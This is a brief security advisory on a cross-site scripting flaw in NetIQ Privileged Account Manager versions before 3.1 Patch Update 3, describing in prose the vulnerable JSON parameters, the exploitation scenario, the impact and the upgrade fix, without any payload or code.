Cross site scripting attacks against NetIQ Privileged Account Manager

Vulnerability

NetIQ Privileged Account Manager (NPAM) versions prior to 3.1 Patch Update 3 are vulnerable to cross-site scripting (XSS) due to insufficient sanitization of the type and account parameters in JSON requests. An attacker can inject arbitrary JavaScript code via these parameters, which is then executed in the browser of any user viewing the affected page.

Exploitation

An attacker can exploit this vulnerability by crafting a malicious JSON request containing JavaScript payloads in the type or account parameters. No authentication is required if the endpoint is publicly accessible, but the attacker must be able to deliver the crafted request to a victim user, typically through social engineering or by embedding the request in a malicious link. The XSS is triggered when the victim's browser processes the response containing the injected script.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the NPAM web application. This can lead to session hijacking, credential theft, defacement, or unauthorized actions performed on behalf of the victim user, potentially compromising the security of the privileged account management system.

Mitigation

The vulnerability is fixed in NetIQ Privileged Account Manager version 3.1 Patch Update 3, released on an unspecified date [1]. Users should upgrade to this version or later. No workarounds are documented in the available references.